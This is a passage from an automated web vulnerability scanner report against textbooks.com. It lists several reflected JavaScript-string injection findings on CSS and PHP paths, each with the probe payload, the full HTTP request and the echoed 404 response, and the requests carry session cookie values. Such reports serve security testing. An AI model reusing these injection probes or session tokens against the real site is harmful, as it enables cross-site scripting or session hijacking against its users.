Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3629
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:54 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
SearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/css52a11';9e00a943245/prod5.css'

</script>
...[SNIP]...

1.52. http://www.textbooks.com/css/prod5.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /css/prod5.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a2c6'%3beb439cb4840 was submitted in the REST URL parameter 2. This input was echoed as 4a2c6';eb439cb4840 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/prod5.css4a2c6'%3beb439cb4840 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3629
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:55 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
t() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/css/prod5.css4a2c6';eb439cb4840'

</script>
...[SNIP]...

1.53. http://www.textbooks.com/css/tb-v3.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /css/tb-v3.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6c70'%3b5ad97567bac was submitted in the REST URL parameter 1. This input was echoed as a6c70';5ad97567bac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssa6c70'%3b5ad97567bac/tb-v3.css HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3629
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:54 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
SearchReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/cssa6c70';5ad97567bac/tb-v3.css'

</script>
...[SNIP]...

1.54. http://www.textbooks.com/css/tb-v3.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /css/tb-v3.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b060'%3b5f394d62013 was submitted in the REST URL parameter 2. This input was echoed as 7b060';5f394d62013 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/tb-v3.css7b060'%3b5f394d62013 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3629
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:51:55 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
t() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/css/tb-v3.css7b060';5f394d62013'

</script>
...[SNIP]...

1.55. http://www.textbooks.com/custserv-intprop.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /custserv-intprop.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18ef'%3b2ddf58b8cc7 was submitted in the REST URL parameter 1. This input was echoed as e18ef';2ddf58b8cc7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /custserv-intprop.phpe18ef'%3b2ddf58b8cc7 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3636
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:32 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/custserv-intprop.phpe18ef';2ddf58b8cc7'

</script>
...[SNIP]...

1.56. http://www.textbooks.com/custserv-whatisused.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /custserv-whatisused.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f856'%3bc87f43ffde1 was submitted in the REST URL parameter 1. This input was echoed as 2f856';c87f43ffde1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /custserv-whatisused.php2f856'%3bc87f43ffde1 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3639
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:12 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
j    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/custserv-whatisused.php2f856';c87f43ffde1'

</script>
...[SNIP]...

1.57. http://www.textbooks.com/etextbooks.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /etextbooks.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85567'%3bc651150f7b2 was submitted in the REST URL parameter 1. This input was echoed as 85567';c651150f7b2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /etextbooks.php85567'%3bc651150f7b2 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
